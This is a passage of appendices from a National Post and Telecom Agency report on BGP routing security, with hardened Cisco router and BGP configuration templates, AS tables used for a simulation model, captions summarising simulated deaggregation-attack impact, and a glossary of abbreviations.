314) access-list 115 permit ip 7.7.7.0 0.0.0.255 any
315) ! Second, allow our firewall to access the Internet. This
is useful
316) ! for testing.
317) access-list 115 permit ip host 6.6.6.1 any
318) ! Now log all other such attempts.
319) access-list 115 deny ip any any log-input
320) !
321) ! Rate limit (CAR) ACLs for UDP, ICMP, and multicast.
322) access-list 150 remark CAR-UDP ACL
323) access-list 150 permit udp any any
324) access-list 160 remark CAR-ICMP ACL
325) access-list 160 permit icmp any any
326) access-list 170 remark CAR-Multicast ACL
327) access-list 170 permit ip any 224.0.0.0 15.255.255.255
328) !
329) ! Deny any packets from the RFC 1918, IANA reserved, test,
330) ! multicast as a source, and loopback netblocks to block
331) ! attacks from commonly spoofed IP addresses.
332) access-list 2010 remark Anti-bogon ACL
333) ! Claims it came from the inside network, yet arrives on
the
334) ! outside (read: Internet) interface. Do not use this if
CEF
335) ! has been configured to take care of spoofing.
336) ! access-list 2010 deny ip 6.6.6.0 0.0.0.255 any log-input
337) ! access-list 2010 deny ip 7.7.7.0 0.0.0.255 any log-input
338) ! Bogons
339) access-list 2010 deny ip 0.0.0.0 0.255.255.255 any loginput
340) ...
341) BOGON filters removed from this Appendix!
National Post and Telecom Agency
137
Contents - APPENDIX 3
342)
343)
344)
345)
346)
347)
348)
349)
350)
351)
352)
353)
354)
355)
356)
357)
358)
359)
360)
361)
362)
363)
364)
365)
366)
367)
368)
369)
370)
371)
372)
373)
374)
375)
376)
377)
378)
379)
380)
381)
382)
383)
384)
385)
386)
387)
388)
389)
390)
391)
392)
393)
394)
395)
396)
397)
398)
399)
400)
401)
402)
403)
404)
405)
406)
138
See latest information on [41]!
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
National Post and Telecom Agency
- APPENDIX 3
407) ...
408) ...
409) ! Drop all ICMP fragments
410) access-list 2010 deny icmp any any fragments log-input
411) ! Allow IP access to the intranet (firewall filters
specific ports)
412) access-list 2010 permit ip any 7.7.7.0 0.0.0.255
413) ! Allow multicast to enter. See also access-list 30 for
more
414) ! specific multicast rules.
415) access-list 2010 permit ip any 224.0.0.0 15.255.255.255
416) ! Our explicit (read: logged) drop all rule
417) access-list 2010 deny ip any any log-input
418) !
419) ! Do not share CDP information, which contains key bits
about our
420) ! configuration, etc. This command disabled CDP globally.
If you
421) ! require CDP on an interface, use cdp run and disable cdp
422) ! (no cdp enable) on the Internet-facing interface.
423) no cdp run
424) ! SNMP is VERY important, particularly with MRTG.
425) ! Treat the COMMUNITY string as a password - keep it
difficult to guess.
426) snmp-server community <COMMUNITY> RO 20
427) !
428) ! Introduce ourselves with an appropriately stern banner.
429) banner motd %
430) Router foo. Access to this device or the attached
431) networks is prohibited without express written permission.
432) Violators will be prosecuted to the fullest extent of both
civil
433) and criminal law.
434)
435) We don't like you. Go away.
436)
437) %
438) !
439) line con 0
440) exec-timeout 15 0
441) transport input none
442) line aux 0
443) exec-timeout 15 0
444) line vty 0 3
445) access-class 100 in
446) exec-timeout 15 0
447) ! Enable SSH connectivity. This is much more secure than
telnet.
448) ! Obviously, you must have an IOS image that supports SSH,
and don't
449) ! forget to generate the key with crypto key generate rsa.
450) transport input telnet ssh
451) line vty 4
452) access-class 105 in
453) exec-timeout 15 0
454) transport input telnet ssh
455) !
National Post and Telecom Agency
139
Contents - APPENDIX 3
9
Appendix B: Configuration template for BGP on a
Cisco router
1) ! Our ASN is 111
2) router bgp 111
3) !
4) ! Don't wait for the IGP to catch up.
5) no synchronization
6) !
7) ! Be a little more forgiving of an occasional missed keepalive.
8) no bgp fast-external-fallover
9) !
10) ! Track and punt, via syslog, all interesting observations about
our
11) ! neighbors.
12) bgp log-neighbor-changes
13) !
14) ! Announce our netblock(s) in a manner that does not increase
CPU
15) ! utilization. Redistributing from an IGP is dangerous as it
increases
16) ! the likelihood of flapping and instability. Redistributing
static is
17) ! more stable, but requires the CPU to peruse the routing table
at a set
18) ! interval to capture any changes. The network statement,
combined with
19) ! a null route, is the least expensive (in terms of CPU
utilization) and
20) ! most reliable (in terms of stability) option.
21) network 1.88.0.0 mask 255.255.224.0
22) !
23) ! Our first neighbor, 10.10.5.1, is an eBGP peer with the ASN of
333.
24) neighbor 10.10.5.1 remote-as 333
25) !
26) ! Set for soft reconfiguration, thus preventing a complete
withdrawal
27) ! of all announced prefixes when clear ip bgp x.x.x.x is typed.
28) neighbor 10.10.5.1 soft-reconfiguration inbound
29) !
30) ! Type in a description for future reference. Not everyone
memorizes
31) ! ASNs. :-)
32) neighbor 10.10.5.1 description eBGP with ISP333
33) !
34) ! Set up a password for authentication.
35) neighbor 10.10.5.1 password bgpwith333
36) !
37) ! Hard-set for version 4. Disabled BGP version negotiation, thus
38) ! bringing the peering session on-line more quickly.
39) neighbor 10.10.5.1 version 4
40) !
41) ! Block any inbound announcments that include bogon networks. A
prefix
42) ! list is used because it is:
140
National Post and Telecom Agency
- APPENDIX 3
43) ! 1) Easier on the CPU than ACLs, and
44) ! 2) Easier to modify.
45) ! See the actual bogons prefix-list below.
46) neighbor 10.10.5.1 prefix-list bogons in
47) !
48) ! Announce only those networks we specifically list. This also
prevents
49) ! the network from becoming a transit provider. An added bit of
protection
50) ! and good netizenship. See the announce prefix-list below.
51) neighbor 10.10.5.1 prefix-list announce out
52) !
53) ! Prevent a mistake or mishap by our peer (or someone with whom
our peer
54) ! has a peering agreement) from causing router meltdown by
filling the
55) ! routing and BGP tables. This is a hard limit. At 75% of this
limit,
56) ! the IOS will issue log messages warning that the neighbor is
approaching
57) ! the limit. All log messages should be sent to a remote syslog
host.
58) ! The warning water mark can be modified by placing a value
after the
59) ! maximum prefix value, e.g. maximum-prefix 175000 50. This will
set the
60) ! IOS to issue warning messages when the neighbor reaches 50% of
the limit.
61) ! Note that this number may need to be adjusted upward in the
future to
62) ! account for growth in the Internet routing table.
63) neighbor 10.10.5.1 maximum-prefix 175000
64) !
65) ! Our next neighbor is 10.10.10.1, an eBGP peer with the ASN of
222.
66) neighbor 10.10.10.1 remote-as 222
67) neighbor 10.10.10.1 soft-reconfiguration inbound
68) neighbor 10.10.10.1 description eBGP with ISP222
69) neighbor 10.10.10.1 password bgpwith222
70) neighbor 10.10.10.1 version 4
71) neighbor 10.10.10.1 prefix-list bogons in
72) neighbor 10.10.10.1 prefix-list announce out
73) neighbor 10.10.10.1 maximum-prefix 175000
74) !
75) ! This is our iBGP peer, 172.17.70.2.
76) neighbor 172.17.70.2 remote-as 111
77) !
78) neighbor 172.17.70.2 soft-reconfiguration inbound
79) !
80) ! Again, a handy description.
81) neighbor 172.17.70.2 description iBGP with our other router
82) !
83) neighbor 172.17.70.2 password bgpwith111
84) ! Use the loopback interface for iBGP announcements. This
increases the
85) ! stability of iBGP.
86) neighbor 172.17.70.2 update-source Loopback0
87) neighbor 172.17.70.2 version 4
88) neighbor 172.17.70.2 next-hop-self
89) neighbor 172.17.70.2 prefix-list bogons in
90) neighbor 172.17.70.2 maximum-prefix 175000
91) !
92) ! Do not automatically summarize our announcements.
93) no auto-summary
National Post and Telecom Agency
141
Contents - APPENDIX 3
94) ! If we have multiple links on the same router to the same AS,
we like to
95) ! put them to good use. Load balance, per destination, with
maximum-paths.
96) ! The limit is six. For our example, we will assume two equal
size pipes
97) ! to the same AS.
98) maximum-paths 2
99) !
100)
! Now add our null route and the loopback/iBGP route.
Remember to add
101)
! more specific non-null routes so that the packets travel
to their
102)
! intended destination!
103)
ip route 1.88.0.0 255.255.224.0 Null0
104)
ip route 1.88.50.0 255.255.255.0 192.168.50.5
105)
ip route 1.88.55.0 255.255.255.0 192.168.50.8
106)
ip route 1.88.75.128 255.255.255.128 192.168.50.10
107)
ip route 172.17.70.2 255.255.255.255 192.168.50.2
108)
!
109)
! We protect TCP port 179 (BGP port) from miscreants by
limiting
110)
! access. Allow our peers to connect and log all other
attempts.
111)
! Remember to apply this ACL to the interfaces of the
router or
112)
! add it to existing ACLs.
113)
access-list 185 permit tcp host 10.10.5.1 host 10.10.5.2
eq 179
114)
access-list 185 permit tcp host 10.10.5.1 eq bgp host
10.10.5.2
115)
access-list 185 permit tcp host 10.10.10.1 host 10.10.10.2
eq 179
116)
access-list 185 permit tcp host 10.10.10.1 eq bgp host
10.10.10.2
117)
access-list 185 permit tcp host 172.17.70.2 host
172.17.70.1 eq 179
118)
access-list 185 permit tcp host 172.17.70.2 eq bgp host
172.17.70.1
119)
access-list 185 deny tcp any any eq 179 log-input
120)
!
121)
! The announce prefix list prevents us from announcing
anything beyond
122)
! our aggregated netblock(s).
123)
ip prefix-list announce description Our allowed routing
announcements
124)
ip prefix-list announce seq 5 permit 1.88.0.0/19
125)
ip prefix-list announce seq 10 deny 0.0.0.0/0 le 32
126)
!
127)
! The bogons prefix list prevents the acceptance of
obviously bogus
128)
! routing updates. This can be modified to fit local
requirements.
129)
! While aggregation is possible - certainly desirable IANA tends
130)
! to allocate netblocks on a /8 boundary. For this reason,
I have
131)
! listed the bogons largely as /8 netblocks. This will
make changes
132)
! to the bogons prefix-list easier to accomplish and less
intrusive.
133)
! I have listed more specific netblocks when
documentation, such as
134)
! RFC1918, is more granular.
142
National Post and Telecom Agency
- APPENDIX 3
135)
! Please see the IANA IPv4 netblock assignment document at
the
136)
! following URL:
137)
! http://www.iana.org/assignments/ipv4-address-space
138)
ip prefix-list bogons description Bogon networks we won't
accept.
139)
ip prefix-list bogons seq 5 deny 0.0.0.0/8 le 32
140)
...
141)
BOGON filters removed from this Appendix!
142)
See latest information on [41]
143)
...
144)
...
145)
...
146)
...
147)
...
148)
...
149)
...
150)
...
151)
...
152)
...
153)
...
154)
...
155)
...
156)
...
157)
...
158)
...
159)
...
160)
...
161)
...
162)
...
163)
...
164)
...
165)
...
166)
...
167)
...
168)
...
169)
...
170)
...
171)
...
172)
...
173)
...
174)
...
175)
...
176)
...
177)
...
178)
...
179)
...
180)
...
181)
...
182)
...
183)
...
184)
...
185)
...
186)
...
187)
...
188)
...
189)
...
190)
...
191)
...
192)
...
193)
...
194)
...
195)
...
196)
...
197)
...
National Post and Telecom Agency
143
Contents - APPENDIX 3
198)
199)
200)
201)
202)
203)
204)
205)
206)
207)
208)
209)
210)
211)
212)
213)
144
...
...
...
...
...
...
...
...
...
...
...
! Allow all prefixes up to /27. Your mileage may vary,
! so adjust this to fit your specific requirements.
ip prefix-list bogons seq 525 permit 0.0.0.0/0 le 27
!
! END
National Post and Telecom Agency
- APPENDIX 3
Appendix C: Input data and extracted data for the model
This appendix contains lists of input data sources and some data that has been extracted for the
model.
Table 1: Peer AS routing tables used to construct the model.
Route Views
Peer AS
286
4513
293
5056
701
5459
852
5511
1221
5650
1224
6079
1239
6395
1299
6453
1668
RIPE Peer
AS
42
8190
286
8289
786
8342
1290
8422
1299
8426
2116
8434
2686
8468
2856
8642
2914
8674
3246
9019
3257
12390
3292
12621
3301
12932
3303
12956
3336
13184
6461
National Post and Telecom Agency
145
Contents - APPENDIX 3
Table 2: AS included in the model.
ISPs
Customers (cont
1257
SWIPNET
112
ROOTSERV
29602
WWWGBG-AS
1299
TELIANET
158
ERI-AS
30795
INTRON-AS
1653
SUNET
1729
TELIA-TCN
30880
SPACEDUMP-AS
1880
UNSPECIFIED
2831
UNSPECIFIED
30950
BREDBANDS
ALLIANSEN
31024
MAVIATION-AS
31331
LINNEA-AS
2119
TELENOR-NEXTEL
2833
SUNET-UMU
2611
BELNET
2834
UNSPECIFIED
3246
TDCSONG
2837
UNSPECIFIED
3274
CYGATE
2839
UNSPECIFIED
31529
DENIC-ANYCAST
AS
3292
TDC
2841
CHALMERS
31574
SE-BGC-AS
3301
TELIANET-SWEDEN
2842
UNSPECIFIED
33976
aftonbladet-se
3549
GBLX
2843
UNSPECIFIED
34029
IBXNORDIC-AS
5400
BT
2846
UNSPECIFIED
34228
SERVERA-AS
6830
UPC
5569
UNSPECIFIED
8190
VIATEL
6432
DOUBLECLICK
8289
Dataphone
7500
M-ROOT
209
ASN-QWEST
8341
QUICKNET
MICROSOFT-CORP--MSN-AS-BLOCK
286
KPN
8075
701
ALTERNET-AS
8523
BASEFARM-SE-ASN
702
AS702
8702
UNSPECIFIED
9201
SwAF
8374
8434
8473
8642
8674
12552
12597
146
Customers
PLUSNET
TELENOR-SE
BAHNHOF
B2
NOCOM
13104
SE-VENTELO
1200
AMS-IX1
1239
SPRINTLINK
1273
CW
12362
NETCOM
12381
WIDELL-GORDEN
1759
SONERA-TRANS
AS
12501
NorrNod
2603
NORDUNET
12929
NETCOM-AS
15169
GOOGLE
15527
UNSPECIFIED
15782
PERSPEKTIV-AS
GOTANET
12935
WOODYNET-1
WINEASY
IPO-EU
LYCOS-EUROPE
42
12352
NETNOD-IX
12832
Neighbours
National Post and Telecom Agency
- APPENDIX 3
11
Appendix D: Simulation results
This appendix contains some simulation results extracted from the main text.
Figure 31.
The impact of deaggregation attacks on Internet broker 1. Top left: histogram
showing the number of AS affected. (Each column indicates the number of attack
points that affect a certain number of AS. The number of AS is indicated on the x
axis.) Top right: histogram showing the proportion of users (based on the market
shares of ISPs) that are affected. (Each column indicates the number of attack points
that affect a certain proportion of users.) This case only includes attacks affecting
more than zero users. Bottom left: histogram showing the proportion of users (based
on the market shares of ISPs) over and above those affected within the attacking AS.
(Each column indicates the number of attack points that affect a certain proportion
of users.) This case also only includes attacks affecting more than zero users.
National Post and Telecom Agency
147
Contents - APPENDIX 3
Figure 32. The impact of deaggregation attacks on Internet broker 2. Top left: histogram
showing the number of AS affected. (Each column indicates the number of attack
points that affect a certain number of AS. The number of AS is indicated on the x
axis.) Top right: histogram showing the proportion of users (based on the market
shares of ISPs) that are affected. (Each column indicates the number of attack points
that affect a certain proportion of users.) This case only includes attacks affecting
more than zero users. Bottom left: histogram showing the proportion of users (based
on the market shares of ISPs) over and above those affected within the attacking AS.
(Each column indicates the number of attack points that affect a certain proportion
of users.) This case also only includes attacks affecting more than zero users.
148
National Post and Telecom Agency
- APPENDIX 3
Figure 33. The impact of deaggregation attacks on the media company. Top left: histogram
showing the number of AS affected. (Each column indicates the number of attack
points that affect a certain number of AS. The number of AS is indicated on the x
axis.) Top right: histogram showing the proportion of users (based on the market
shares of ISPs) that are affected. (Each column indicates the number of attack points
that affect a certain proportion of users.) This case only includes attacks affecting
more than zero users. Bottom left: histogram showing the proportion of users (based
on the market shares of ISPs) over and above those affected within the attacking AS.
(Each column indicates the number of attack points that affect a certain proportion
of users.) This case also only includes attacks affecting more than zero users.
National Post and Telecom Agency
149
Contents - APPENDIX 3
Figure 34. The impact of deaggregation attacks on the public authority. Top left: histogram
showing the number of AS affected. (Each column indicates the number of attack
points that affect a certain number of AS. The number of AS is indicated on the x
axis.) Top right: histogram showing the proportion of users (based on the market
shares of ISPs) that are affected. (Each column indicates the number of attack points
that affect a certain proportion of users.) This case only includes attacks affecting
more than zero users. Bottom left: histogram showing the proportion of users (based
on the market shares of ISPs) over and above those affected within the attacking AS.
(Each column indicates the number of attack points that affect a certain proportion
of users.) This case also only includes attacks affecting more than zero users.
150
National Post and Telecom Agency
- APPENDIX 3
Figure 35. The impact of advertising existing prefixes on a media company. Top left:
histogram showing the number of AS affected. (Each column indicates the number
of attack points that affect a certain number of AS. The number of AS is indicated
on the x axis.) Top right: histogram showing the proportion of users (based on the
market shares of ISPs) that are affected. (Each column indicates the number of
attack points that affect a certain proportion of users.) This case only includes
attacks affecting more than zero users. Bottom left: histogram showing the
proportion of users (based on the market shares of ISPs) over and above those
affected within the attacking AS. (Each column indicates the number of attack
points that affect a certain proportion of users.) This case also only includes attacks
affecting more than zero users.
National Post and Telecom Agency
151
Contents - APPENDIX 3
Figure 36. The impact of advertising existing prefixes on a public authority. Top left:
histogram showing the number of AS affected. (Each column indicates the number
of attack points that affect a certain number of AS. The number of AS is indicated
on the x axis.) Top right: histogram showing the proportion of users (based on the
market shares of ISPs) that are affected. (Each column indicates the number of
attack points that affect a certain proportion of users.) This case only includes
attacks affecting more than zero users. Bottom left: histogram showing the
proportion of users (based on the market shares of ISPs) over and above those
affected within the attacking AS. (Each column indicates the number of attack
points that affect a certain proportion of users.) This case also only includes attacks
affecting more than zero users.
152
National Post and Telecom Agency
- APPENDIX 3
12
Appendix E: Glossary of abbreviations
Glossary and explanation of the abbreviations used in this document:
Abbreviation
ACK
Meaning
Acknowledgment
ARP
AS
BCP
Address Resolution
Protocol
Autonomous System
Best Common Practice
BGP
Border Gateway Protocol
CDP
Cisco Discovery Protocol
CPU
DML
Central Processing Unit
Domain Modeling
Language
Domain Name System
DNS
EIGRP
GTSM
IGP
IOS
IP
IRR
IS-IS
ISP
MD5
MRT
NANOG
OSPF
PTS
RIB
RADB
RIPE
RIPE NCC
RPSL
RR
Enhanced Interior Gateway
Routing Protocol
Generalized TTL Security
Mechanism
Interior Gateway Protocol
Internetwork Operating
System
Internet Protocol
Internet Routing Registry
Intermediate System to
Intermediate System
Internet Service Provider
Message Digest 5
Multithreaded Routing
Toolkit
North American Network
Operators Group
Open Shortest Path First
The National Post and
Telecom Agency
Routing Information Base
Routing Assets Data Base
Réseaux IP Européen
RIPE Network
Coordination Center
Routing Policy
Specification Language
Routing Registry
National Post and Telecom Agency
Brief explanation
TCP flag to acknowledge receipt of a
segment.
The translation of an IP address to a
MAC address.
See Section 1.
Established and agreed good/best
routines or approaches as regards, for
instance, network design, configuration
and operation.
De facto standard protocol for border
routing in the Internet.
A protocol developed by Cisco for the
exchange of information between
routers.
The computer's processor.
Specification language for models in
SSFNet.
A name resolving system in the
Internet.
Cisco's proprietary intradomain routing
protocol.
Former BGP TTL security hack (TTLbased spoofing check of BGP
messages).
Routing protocol within AS.
Cisco's operating system for its routers.
Network protocol in the Internet.
The union of RR databases.
Intradomain routing protocol.
Network operator.
Hash algorithm.
Set of routing tools. (software)
Association for US operators
Intradomain routing protocol.
Routing table
RR database.
European forum for the development
and operation of IP networks.
European 'Regional Internet Registry'
Specification language for policies and
other information for the routing
system
Database for information for the
routing system.
153
Contents - APPENDIX 3
SSFNet
TCP
XML
154
Scalable Simulation
Framework Network
Simulator
Transmission Control
Protocol
Extensible Markup
Language
Network simulator.
Transmission protocol in the Internet.
Markup language.
National Post and Telecom Agency
